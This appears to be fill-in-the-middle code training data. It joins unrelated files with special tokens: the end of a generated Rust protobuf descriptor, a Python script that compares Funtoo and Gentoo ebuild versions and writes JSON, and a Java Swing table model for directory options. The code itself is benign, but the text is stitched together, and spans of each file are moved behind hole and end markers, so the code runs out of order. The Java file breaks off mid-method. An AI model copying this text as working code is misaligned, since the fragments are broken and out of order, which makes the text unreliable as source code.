0x22, 0x94, 0x01, 0x0a, 0x14, 0x54, 0x65, 0x73, 0x74, 0x52, 0x65, 0x70, 0x65, 0x61, 0x74, 0x65,
0x64, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x73, 0x12, 0x28, 0x0a, 0x09, 0x6d, 0x65, 0x73,
0x73, 0x61, 0x67, 0x65, 0x73, 0x31, 0x18, 0x01, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x15, 0x2e, 0x54,
0x65, 0x73, 0x74, 0x52, 0x65, 0x70, 0x65, 0x61, 0x74, 0x65, 0x64, 0x4d, 0x65, 0x73, 0x73, 0x61,
0x67, 0x65, 0x73, 0x12, 0x28, 0x0a, 0x09, 0x6d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x73, 0x32,
0x18, 0x02, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x15, 0x2e, 0x54, 0x65, 0x73, 0x74, 0x52, 0x65, 0x70,
0x65, 0x61, 0x74, 0x65, 0x64, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x73, 0x12, 0x28, 0x0a,
0x09, 0x6d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x73, 0x33, 0x18, 0x03, 0x20, 0x03, 0x28, 0x0b,
0x32, 0x15, 0x2e, 0x54, 0x65, 0x73, 0x74, 0x52, 0x65, 0x70, 0x65, 0x61, 0x74, 0x65, 0x64, 0x4d,
0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x73, 0x22, 0x91, 0x01, 0x0a, 0x14, 0x54, 0x65, 0x73, 0x74,
0x4f, 0x70, 0x74, 0x69, 0x6f, 0x6e, 0x61, 0x6c, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x73,
0x12, 0x27, 0x0a, 0x08, 0x6d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x31, 0x18, 0x01, 0x20, 0x01,
0x28, 0x0b, 0x32, 0x15, 0x2e, 0x54, 0x65, 0x73, 0x74, 0x4f, 0x70, 0x74, 0x69, 0x6f, 0x6e, 0x61,
0x6c, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x73, 0x12, 0x27, 0x0a, 0x08, 0x6d, 0x65, 0x73,
0x73, 0x61, 0x67, 0x65, 0x32, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x15, 0x2e, 0x54, 0x65,
0x73, 0x74, 0x4f, 0x70, 0x74, 0x69, 0x6f, 0x6e, 0x61, 0x6c, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67,
0x65, 0x73, 0x12, 0x27, 0x0a, 0x08, 0x6d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x33, 0x18, 0x03,
0x20, 0x01, 0x28, 0x0b, 0x32, 0x15, 0x2e, 0x54, 0x65, 0x73, 0x74, 0x4f, 0x70, 0x74, 0x69, 0x6f,
0x6e, 0x61, 0x6c, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x73, 0x22, 0x31, 0x0a, 0x0b, 0x54,
0x65, 0x73, 0x74, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x73, 0x12, 0x0a, 0x0a, 0x02, 0x73, 0x31,
0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x12, 0x0a, 0x0a, 0x02, 0x73, 0x32, 0x18, 0x02, 0x20, 0x01,
0x28, 0x09, 0x12, 0x0a, 0x0a, 0x02, 0x73, 0x33, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x22, 0xa4,
0x02, 0x0a, 0x0c, 0x50, 0x65, 0x72, 0x66, 0x74, 0x65, 0x73, 0x74, 0x44, 0x61, 0x74, 0x61, 0x12,
0x15, 0x0a, 0x05, 0x74, 0x65, 0x73, 0x74, 0x31, 0x18, 0x01, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x06,
0x2e, 0x54, 0x65, 0x73, 0x74, 0x31, 0x12, 0x2d, 0x0a, 0x12, 0x74, 0x65, 0x73, 0x74, 0x5f, 0x72,
0x65, 0x70, 0x65, 0x61, 0x74, 0x65, 0x64, 0x5f, 0x62, 0x6f, 0x6f, 0x6c, 0x18, 0x02, 0x20, 0x03,
0x28, 0x0b, 0x32, 0x11, 0x2e, 0x54, 0x65, 0x73, 0x74, 0x52, 0x65, 0x70, 0x65, 0x61, 0x74, 0x65,
0x64, 0x42, 0x6f, 0x6f, 0x6c, 0x12, 0x35, 0x0a, 0x16, 0x74, 0x65, 0x73, 0x74, 0x5f, 0x72, 0x65,
0x70, 0x65, 0x61, 0x74, 0x65, 0x64, 0x5f, 0x6d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x73, 0x18,
0x03, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x15, 0x2e, 0x54, 0x65, 0x73, 0x74, 0x52, 0x65, 0x70, 0x65,
0x61, 0x74, 0x65, 0x64, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x73, 0x12, 0x35, 0x0a, 0x16,
0x74, 0x65, 0x73, 0x74, 0x5f, 0x6f, 0x70, 0x74, 0x69, 0x6f, 0x6e, 0x61, 0x6c, 0x5f, 0x6d, 0x65,
0x73, 0x73, 0x61, 0x67, 0x65, 0x73, 0x18, 0x04, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x15, 0x2e, 0x54,
0x65, 0x73, 0x74, 0x4f, 0x70, 0x74, 0x69, 0x6f, 0x6e, 0x61, 0x6c, 0x4d, 0x65, 0x73, 0x73, 0x61,
0x67, 0x65, 0x73, 0x12, 0x22, 0x0a, 0x0c, 0x74, 0x65, 0x73, 0x74, 0x5f, 0x73, 0x74, 0x72, 0x69,
0x6e, 0x67, 0x73, 0x18, 0x05, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x0c, 0x2e, 0x54, 0x65, 0x73, 0x74,
0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x73, 0x12, 0x3c, 0x0a, 0x1a, 0x74, 0x65, 0x73, 0x74, 0x5f,
0x72, 0x65, 0x70, 0x65, 0x61, 0x74, 0x65, 0x64, 0x5f, 0x70, 0x61, 0x63, 0x6b, 0x65, 0x64, 0x5f,
0x69, 0x6e, 0x74, 0x33, 0x32, 0x18, 0x06, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x18, 0x2e, 0x54, 0x65,
0x73, 0x74, 0x52, 0x65, 0x70, 0x65, 0x61, 0x74, 0x65, 0x64, 0x50, 0x61, 0x63, 0x6b, 0x65, 0x64,
0x49, 0x6e, 0x74, 0x33, 0x32, 0x4a, 0xf4, 0x0b, 0x0a, 0x06, 0x12, 0x04, 0x00, 0x00, 0x25, 0x01,
0x0a, 0x0a, 0x0a, 0x02, 0x04, 0x00, 0x12, 0x04, 0x00, 0x00, 0x02, 0x01, 0x0a, 0x0a, 0x0a, 0x03,
0x04, 0x00, 0x01, 0x12, 0x03, 0x00, 0x08, 0x0d, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x00, 0x02, 0x00,
0x12, 0x03, 0x01, 0x04, 0x1d, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x00, 0x02, 0x00, 0x04, 0x12, 0x03,
0x01, 0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x00, 0x02, 0x00, 0x05, 0x12, 0x03, 0x01, 0x0d,
0x12, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x00, 0x02, 0x00, 0x01, 0x12, 0x03, 0x01, 0x13, 0x18, 0x0a,
0x0c, 0x0a, 0x05, 0x04, 0x00, 0x02, 0x00, 0x03, 0x12, 0x03, 0x01, 0x1b, 0x1c, 0x0a, 0x0a, 0x0a,
0x02, 0x04, 0x01, 0x12, 0x04, 0x04, 0x00, 0x06, 0x01, 0x0a, 0x0a, 0x0a, 0x03, 0x04, 0x01, 0x01,
0x12, 0x03, 0x04, 0x08, 0x18, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x01, 0x02, 0x00, 0x12, 0x03, 0x05,
0x04, 0x1d, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x01, 0x02, 0x00, 0x04, 0x12, 0x03, 0x05, 0x04, 0x0c,
0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x01, 0x02, 0x00, 0x05, 0x12, 0x03, 0x05, 0x0d, 0x11, 0x0a, 0x0c,
0x0a, 0x05, 0x04, 0x01, 0x02, 0x00, 0x01, 0x12, 0x03, 0x05, 0x12, 0x18, 0x0a, 0x0c, 0x0a, 0x05,
0x04, 0x01, 0x02, 0x00, 0x03, 0x12, 0x03, 0x05, 0x1b, 0x1c, 0x0a, 0x0a, 0x0a, 0x02, 0x04, 0x02,
0x12, 0x04, 0x08, 0x00, 0x0a, 0x01, 0x0a, 0x0a, 0x0a, 0x03, 0x04, 0x02, 0x01, 0x12, 0x03, 0x08,
0x08, 0x1f, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x02, 0x02, 0x00, 0x12, 0x03, 0x09, 0x04, 0x30, 0x0a,
0x0c, 0x0a, 0x05, 0x04, 0x02, 0x02, 0x00, 0x04, 0x12, 0x03, 0x09, 0x04, 0x0c, 0x0a, 0x0c, 0x0a,
0x05, 0x04, 0x02, 0x02, 0x00, 0x05, 0x12, 0x03, 0x09, 0x0d, 0x12, 0x0a, 0x0c, 0x0a, 0x05, 0x04,
0x02, 0x02, 0x00, 0x01, 0x12, 0x03, 0x09, 0x13, 0x19, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x02, 0x02,
0x00, 0x03, 0x12, 0x03, 0x09, 0x1c, 0x1d, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x02, 0x02, 0x00, 0x08,
0x12, 0x03, 0x09, 0x1e, 0x2f, 0x0a, 0x0f, 0x0a, 0x08, 0x04, 0x02, 0x02, 0x00, 0x08, 0xe7, 0x07,
0x00, 0x12, 0x03, 0x09, 0x20, 0x2d, 0x0a, 0x10, 0x0a, 0x09, 0x04, 0x02, 0x02, 0x00, 0x08, 0xe7,
0x07, 0x00, 0x02, 0x12, 0x03, 0x09, 0x20, 0x26, 0x0a, 0x11, 0x0a, 0x0a, 0x04, 0x02, 0x02, 0x00,
0x08, 0xe7, 0x07, 0x00, 0x02, 0x00, 0x12, 0x03, 0x09, 0x20, 0x26, 0x0a, 0x12, 0x0a, 0x0b, 0x04,
0x02, 0x02, 0x00, 0x08, 0xe7, 0x07, 0x00, 0x02, 0x00, 0x01, 0x12, 0x03, 0x09, 0x20, 0x26, 0x0a,
0x10, 0x0a, 0x09, 0x04, 0x02, 0x02, 0x00, 0x08, 0xe7, 0x07, 0x00, 0x03, 0x12, 0x03, 0x09, 0x29,
0x2d, 0x0a, 0x0a, 0x0a, 0x02, 0x04, 0x03, 0x12, 0x04, 0x0c, 0x00, 0x10, 0x01, 0x0a, 0x0a, 0x0a,
0x03, 0x04, 0x03, 0x01, 0x12, 0x03, 0x0c, 0x08, 0x1c, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x03, 0x02,
0x00, 0x12, 0x03, 0x0d, 0x04, 0x30, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x03, 0x02, 0x00, 0x04, 0x12,
0x03, 0x0d, 0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x03, 0x02, 0x00, 0x06, 0x12, 0x03, 0x0d,
0x0d, 0x21, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x03, 0x02, 0x00, 0x01, 0x12, 0x03, 0x0d, 0x22, 0x2b,
0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x03, 0x02, 0x00, 0x03, 0x12, 0x03, 0x0d, 0x2e, 0x2f, 0x0a, 0x0b,
0x0a, 0x04, 0x04, 0x03, 0x02, 0x01, 0x12, 0x03, 0x0e, 0x04, 0x30, 0x0a, 0x0c, 0x0a, 0x05, 0x04,
0x03, 0x02, 0x01, 0x04, 0x12, 0x03, 0x0e, 0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x03, 0x02,
0x01, 0x06, 0x12, 0x03, 0x0e, 0x0d, 0x21, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x03, 0x02, 0x01, 0x01,
0x12, 0x03, 0x0e, 0x22, 0x2b, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x03, 0x02, 0x01, 0x03, 0x12, 0x03,
0x0e, 0x2e, 0x2f, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x03, 0x02, 0x02, 0x12, 0x03, 0x0f, 0x04, 0x30,
0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x03, 0x02, 0x02, 0x04, 0x12, 0x03, 0x0f, 0x04, 0x0c, 0x0a, 0x0c,
0x0a, 0x05, 0x04, 0x03, 0x02, 0x02, 0x06, 0x12, 0x03, 0x0f, 0x0d, 0x21, 0x0a, 0x0c, 0x0a, 0x05,
0x04, 0x03, 0x02, 0x02, 0x01, 0x12, 0x03, 0x0f, 0x22, 0x2b, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x03,
0x02, 0x02, 0x03, 0x12, 0x03, 0x0f, 0x2e, 0x2f, 0x0a, 0x0a, 0x0a, 0x02, 0x04, 0x04, 0x12, 0x04,
0x12, 0x00, 0x16, 0x01, 0x0a, 0x0a, 0x0a, 0x03, 0x04, 0x04, 0x01, 0x12, 0x03, 0x12, 0x08, 0x1c,
0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x04, 0x02, 0x00, 0x12, 0x03, 0x13, 0x04, 0x2f, 0x0a, 0x0c, 0x0a,
0x05, 0x04, 0x04, 0x02, 0x00, 0x04, 0x12, 0x03, 0x13, 0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05, 0x04,
0x04, 0x02, 0x00, 0x06, 0x12, 0x03, 0x13, 0x0d, 0x21, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x04, 0x02,
0x00, 0x01, 0x12, 0x03, 0x13, 0x22, 0x2a, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x04, 0x02, 0x00, 0x03,
0x12, 0x03, 0x13, 0x2d, 0x2e, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x04, 0x02, 0x01, 0x12, 0x03, 0x14,
0x04, 0x2f, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x04, 0x02, 0x01, 0x04, 0x12, 0x03, 0x14, 0x04, 0x0c,
0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x04, 0x02, 0x01, 0x06, 0x12, 0x03, 0x14, 0x0d, 0x21, 0x0a, 0x0c,
0x0a, 0x05, 0x04, 0x04, 0x02, 0x01, 0x01, 0x12, 0x03, 0x14, 0x22, 0x2a, 0x0a, 0x0c, 0x0a, 0x05,
0x04, 0x04, 0x02, 0x01, 0x03, 0x12, 0x03, 0x14, 0x2d, 0x2e, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x04,
0x02, 0x02, 0x12, 0x03, 0x15, 0x04, 0x2f, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x04, 0x02, 0x02, 0x04,
0x12, 0x03, 0x15, 0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x04, 0x02, 0x02, 0x06, 0x12, 0x03,
0x15, 0x0d, 0x21, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x04, 0x02, 0x02, 0x01, 0x12, 0x03, 0x15, 0x22,
0x2a, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x04, 0x02, 0x02, 0x03, 0x12, 0x03, 0x15, 0x2d, 0x2e, 0x0a,
0x0a, 0x0a, 0x02, 0x04, 0x05, 0x12, 0x04, 0x18, 0x00, 0x1c, 0x01, 0x0a, 0x0a, 0x0a, 0x03, 0x04,
0x05, 0x01, 0x12, 0x03, 0x18, 0x08, 0x13, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x05, 0x02, 0x00, 0x12,
0x03, 0x19, 0x04, 0x1b, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x05, 0x02, 0x00, 0x04, 0x12, 0x03, 0x19,
0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x05, 0x02, 0x00, 0x05, 0x12, 0x03, 0x19, 0x0d, 0x13,
0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x05, 0x02, 0x00, 0x01, 0x12, 0x03, 0x19, 0x14, 0x16, 0x0a, 0x0c,
0x0a, 0x05, 0x04, 0x05, 0x02, 0x00, 0x03, 0x12, 0x03, 0x19, 0x19, 0x1a, 0x0a, 0x0b, 0x0a, 0x04,
0x04, 0x05, 0x02, 0x01, 0x12, 0x03, 0x1a, 0x04, 0x1b, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x05, 0x02,
0x01, 0x04, 0x12, 0x03, 0x1a, 0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x05, 0x02, 0x01, 0x05,
0x12, 0x03, 0x1a, 0x0d, 0x13, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x05, 0x02, 0x01, 0x01, 0x12, 0x03,
0x1a, 0x14, 0x16, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x05, 0x02, 0x01, 0x03, 0x12, 0x03, 0x1a, 0x19,
0x1a, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x05, 0x02, 0x02, 0x12, 0x03, 0x1b, 0x04, 0x1b, 0x0a, 0x0c,
0x0a, 0x05, 0x04, 0x05, 0x02, 0x02, 0x04, 0x12, 0x03, 0x1b, 0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05,
0x04, 0x05, 0x02, 0x02, 0x05, 0x12, 0x03, 0x1b, 0x0d, 0x13, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x05,
0x02, 0x02, 0x01, 0x12, 0x03, 0x1b, 0x14, 0x16, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x05, 0x02, 0x02,
0x03, 0x12, 0x03, 0x1b, 0x19, 0x1a, 0x0a, 0x0a, 0x0a, 0x02, 0x04, 0x06, 0x12, 0x04, 0x1e, 0x00,
0x25, 0x01, 0x0a, 0x0a, 0x0a, 0x03, 0x04, 0x06, 0x01, 0x12, 0x03, 0x1e, 0x08, 0x14, 0x0a, 0x0b,
0x0a, 0x04, 0x04, 0x06, 0x02, 0x00, 0x12, 0x03, 0x1f, 0x04, 0x1d, 0x0a, 0x0c, 0x0a, 0x05, 0x04,
0x06, 0x02, 0x00, 0x04, 0x12, 0x03, 0x1f, 0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02,
0x00, 0x06, 0x12, 0x03, 0x1f, 0x0d, 0x12, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x00, 0x01,
0x12, 0x03, 0x1f, 0x13, 0x18, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x00, 0x03, 0x12, 0x03,
0x1f, 0x1b, 0x1c, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x06, 0x02, 0x01, 0x12, 0x03, 0x20, 0x04, 0x35,
0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x01, 0x04, 0x12, 0x03, 0x20, 0x04, 0x0c, 0x0a, 0x0c,
0x0a, 0x05, 0x04, 0x06, 0x02, 0x01, 0x06, 0x12, 0x03, 0x20, 0x0d, 0x1d, 0x0a, 0x0c, 0x0a, 0x05,
0x04, 0x06, 0x02, 0x01, 0x01, 0x12, 0x03, 0x20, 0x1e, 0x30, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06,
0x02, 0x01, 0x03, 0x12, 0x03, 0x20, 0x33, 0x34, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x06, 0x02, 0x02,
0x12, 0x03, 0x21, 0x04, 0x3d, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x02, 0x04, 0x12, 0x03,
0x21, 0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x02, 0x06, 0x12, 0x03, 0x21, 0x0d,
0x21, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x02, 0x01, 0x12, 0x03, 0x21, 0x22, 0x38, 0x0a,
0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x02, 0x03, 0x12, 0x03, 0x21, 0x3b, 0x3c, 0x0a, 0x0b, 0x0a,
0x04, 0x04, 0x06, 0x02, 0x03, 0x12, 0x03, 0x22, 0x04, 0x3d, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06,
0x02, 0x03, 0x04, 0x12, 0x03, 0x22, 0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x03,
0x06, 0x12, 0x03, 0x22, 0x0d, 0x21, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x03, 0x01, 0x12,
0x03, 0x22, 0x22, 0x38, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x03, 0x03, 0x12, 0x03, 0x22,
0x3b, 0x3c, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x06, 0x02, 0x04, 0x12, 0x03, 0x23, 0x04, 0x2a, 0x0a,
0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x04, 0x04, 0x12, 0x03, 0x23, 0x04, 0x0c, 0x0a, 0x0c, 0x0a,
0x05, 0x04, 0x06, 0x02, 0x04, 0x06, 0x12, 0x03, 0x23, 0x0d, 0x18, 0x0a, 0x0c, 0x0a, 0x05, 0x04,
0x06, 0x02, 0x04, 0x01, 0x12, 0x03, 0x23, 0x19, 0x25, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02,
0x04, 0x03, 0x12, 0x03, 0x23, 0x28, 0x29, 0x0a, 0x0b, 0x0a, 0x04, 0x04, 0x06, 0x02, 0x05, 0x12,
0x03, 0x24, 0x04, 0x44, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x05, 0x04, 0x12, 0x03, 0x24,
0x04, 0x0c, 0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x05, 0x06, 0x12, 0x03, 0x24, 0x0d, 0x24,
0x0a, 0x0c, 0x0a, 0x05, 0x04, 0x06, 0x02, 0x05, 0x01, 0x12, 0x03, 0x24, 0x25, 0x3f, 0x0a, 0x0c,
0x0a, 0x05, 0x04, 0x06, 0x02, 0x05, 0x03, 0x12, 0x03, 0x24, 0x42, 0x43,
];
static mut file_descriptor_proto_lazy: ::protobuf::lazy::Lazy<::protobuf::descriptor::FileDescriptorProto> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const ::protobuf::descriptor::FileDescriptorProto,
};
fn parse_descriptor_proto() -> ::protobuf::descriptor::FileDescriptorProto {
::protobuf::parse_from_bytes(file_descriptor_proto_data).unwrap()
}
pub fn file_descriptor_proto() -> &'static ::protobuf::descriptor::FileDescriptorProto {
unsafe {
file_descriptor_proto_lazy.get(|| {
parse_descriptor_proto()
})
}
}<|fim▁end|> | |
<|file_name|>gentoo-compare-json.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python3
# This script will compare the versions of ebuilds in the funtoo portage tree against
# the versions of ebuilds in the target portage tree. Any higher versions in the
# target Portage tree will be printed to stdout.
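# Usage sketch (paths are hypothetical):
#   ./gentoo-compare-json.py /path/to/funtoo-tree /path/to/gentoo-tree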
import portage.versions
import os,sys
import subprocess
import json
from merge_utils import *
dirpath = os.path.dirname(os.path.realpath(__file__))
print("List of differences between funtoo and gentoo")
print("=============================================")
def getKeywords(portdir, ebuild, warn):
a = subprocess.getstatusoutput(dirpath + "/keywords.sh %s %s" % ( portdir, ebuild ) )
if a[0] == 0:
my_set = set(a[1].split())
return (0, my_set)
else:
return a
if len(sys.argv) != 3:
print("Please specify funtoo tree as first argument, gentoo tree as second argument.")
sys.exit(1)
gportdir=sys.argv[2]
portdir=sys.argv[1]
def filterOnKeywords(portdir, ebuilds, keywords, warn=False):
"""
This function accepts a path to a portage tree, a list of ebuilds, and a list of
keywords. It will iteratively find the "best" version in the ebuild list (the most
recent), and then manually extract this ebuild's KEYWORDS using the getKeywords()
function. If at least one of the keywords in "keywords" cannot be found in the
ebuild's KEYWORDS, then the ebuild is removed from the return list.
Think of this function as "skimming the masked cream off the top" of a particular
set of ebuilds. This way our list has been filtered somewhat and we don't have
gcc-6.0 in our list just because someone added it masked to the tree. It makes
comparisons fairer.
"""
filtered = ebuilds[:]
if len(ebuilds) == 0:
return []
cps = portage.versions.catpkgsplit(filtered[0])
cat = cps[0]
pkg = cps[1]
keywords = set(keywords)
while True:
fbest = portage.versions.best(filtered)
if fbest == "":
break
retval, fkeywords = getKeywords(portdir, "%s/%s/%s.ebuild" % (cat, pkg, fbest.split("/")[1] ), warn)
if len(keywords & fkeywords) == 0:
filtered.remove(fbest)
else:
break
return filtered
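# Hypothetical illustration of the filtering above: if sys-devel/gcc-6.0 is
# the "best" version but carries none of {"~amd64", "amd64", "~*", "*"} in
# its KEYWORDS, it is removed and the next-best version is inspected, e.g.
#   filterOnKeywords(portdir,
#                    ["sys-devel/gcc-4.9.3", "sys-devel/gcc-6.0"],
#                    ["~amd64", "amd64", "~*", "*"])
# would return only the gcc-4.9.3 entry.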
def get_cpv_in_portdir(portdir,cat,pkg):
if not os.path.exists("%s/%s/%s" % (portdir, cat, pkg)):
return []
if not os.path.isdir("%s/%s/%s" % (portdir, cat, pkg)):
return []
files = os.listdir("%s/%s/%s" % (portdir, cat, pkg))
ebuilds = []
for file in files:
if file[-7:] == ".ebuild":
ebuilds.append("%s/%s" % (cat, file[:-7]))
return ebuilds
def version_compare(portdir,gportdir,keywords,label):
print<|fim▁hole|> print("(note that package.{un}mask(s) are ignored - looking at ebuilds only)")
print()
for cat in os.listdir(portdir):
if cat == ".git":
continue
if not os.path.exists(gportdir+"/"+cat):
continue
if not os.path.isdir(gportdir+"/"+cat):
continue
for pkg in os.listdir(os.path.join(portdir,cat)):
ebuilds = get_cpv_in_portdir(portdir,cat,pkg)
gebuilds = get_cpv_in_portdir(gportdir,cat,pkg)
ebuilds = filterOnKeywords(portdir, ebuilds, keywords, warn=True)
if len(ebuilds) == 0:
continue
fbest = portage.versions.best(ebuilds)
gebuilds = filterOnKeywords(gportdir, gebuilds, keywords, warn=False)
if len(gebuilds) == 0:
continue
gbest = portage.versions.best(gebuilds)
if fbest == gbest:
continue
# a little trickery to ignore rev differences:
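# (catpkgsplit yields (category, package, version, revision); [1:] drops
# the category, and forcing both revisions to "r0" makes pkgcmp compare
# version parts only)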
fps = list(portage.versions.catpkgsplit(fbest))[1:]
gps = list(portage.versions.catpkgsplit(gbest))[1:]
gps[-1] = "r0"
fps[-1] = "r0"
if gps[-2] in [ "9999", "99999", "999999", "9999999", "99999999"]:
continue
mycmp = portage.versions.pkgcmp(fps, gps)
if mycmp == -1:
json_out[label].append("%s/%s %s %s" % (cat, pkg, gbest[len(cat)+len(pkg)+2:], fbest[len(cat)+len(pkg)+2:]))
print("%s (vs. %s in funtoo)" % ( gbest, fbest ))
json_out={}
for keyw in [ "~amd64" ]:
if keyw == "~x86":
label = "fcx8632"
elif keyw == "~amd64":
label = "fcx8664"
json_out[label] = []
if keyw[0] == "~":
# for unstable, add stable arch and ~* and * keywords too
keyw = [ keyw, keyw[1:], "~*", "*"]
else:
# for stable, also consider the * keyword
keyw = [ keyw, "*"]
version_compare(portdir,gportdir,keyw,label)
for key in json_out:
json_out[key].sort()
json_out[key] = ",".join(json_out[key])
jsonfile = "/home/ports/public_html/my.json"
a = open(jsonfile, 'w')
json.dump(json_out, a, sort_keys=True, indent=4, separators=(',',": "))
a.close()
print("Wrote output to %s" % jsonfile)<|fim▁end|> | print("Package comparison for %s" % keywords)
print("============================================") |
<|file_name|>DirectoryTableModel.java<|end_file_name|><|fim▁begin|>package ls;
import java.util.*;
import javax.swing.table.AbstractTableModel;
public class DirectoryTableModel extends AbstractTableModel {
private final List<DirOpt> dirs = new ArrayList<>();
public List<DirOpt> getDirs () {
return new ArrayList<>(dirs);
}
public void add (DirOpt dir) {
dirs.add(dir);
Collections.sort(dirs);
fireTableDataChanged();
}
public void addAll (List<DirOpt> dirs) {
this.dirs.addAll(dirs);
Collections.sort(this.dirs);
fireTableDataChanged();
}
public void remove (int row) {
dirs.remove(row);
fireTableDataChanged();
}
public void setDir (int row, DirOpt dir) {
dirs.set(row, dir);
Collections.sort(dirs);
<|fim▁hole|> return dirs.get(row);
}
@Override
public int getRowCount () {
return dirs.size();
}
@Override
public int getColumnCount () {
return 3;
}
@Override
public String getColumnName (int column) {
switch (column) {
case 0:
return "Enabled";
case 1:
return "Dir";
case 2:
return "Recursive";
default:
throw new RuntimeException();
}
}
@Override
public Class<?> getColumnClass (int columnIndex) {
switch (columnIndex) {
case 0:
case 2:
return Boolean.class;
case 1:
return String.class;
default:
throw new RuntimeException();
}
}
@Override
public boolean isCellEditable (int rowIndex, int columnIndex) {
switch (columnIndex) {
case 0:
case 2:
return true;
case 1:
return false;
default:
throw new RuntimeException();
}
}
@Override
public Object getValueAt (int row, int col) {
DirOpt d = dirs.get(row);
switch (col) {
case 0:
return d.enabled;
case 1:
return d.dir;
case 2:
return d.recursive;
default:
throw new RuntimeException();
}
}
@Override
public void setValueAt (Object val, int row, int col) {
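// DirOpt appears to be immutable: each edit below constructs a
// replacement instance instead of mutating the stored one.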
DirOpt d = dirs.get(row);
switch (col) {
case 0:
